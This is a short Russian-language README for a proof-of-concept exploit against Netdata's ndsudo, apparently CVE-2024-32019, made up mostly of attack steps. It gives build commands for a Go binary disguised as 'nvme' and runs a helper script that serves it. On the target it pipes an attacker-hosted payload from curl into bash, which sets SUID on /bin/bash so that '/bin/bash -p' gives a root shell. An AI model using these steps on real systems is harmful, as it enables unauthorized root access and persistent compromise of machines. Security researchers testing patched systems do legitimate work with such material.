
Netdata ndsudo PoC
PoC для Netdata ndsudo
Скомпилируйте бинарник:
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
Запустите bash-скрипт:
bash exploit.sh <YOUR IP>
На целевой машине выполните в каталоге с правом на запись:
curl http://<YOUT IP>:8000/payload.sh | bash
Он автоматически загрузит бинарник nvme, экспортирует путь, запустит ndsudo и добавит SUID для /bin/bash.
Возможно, вам нужно изменить путь к ndsudo в exploit.sh
Для повышения привилегий просто выполните:
/bin/bash -p
Эксплоит основан на https://github.com/AzureADTrent/CVE-2024-32019-POC, когда я его тестировал, у меня была ошибка:
execve: Exec format error
Поэтому я решил создать свой с помощью Go.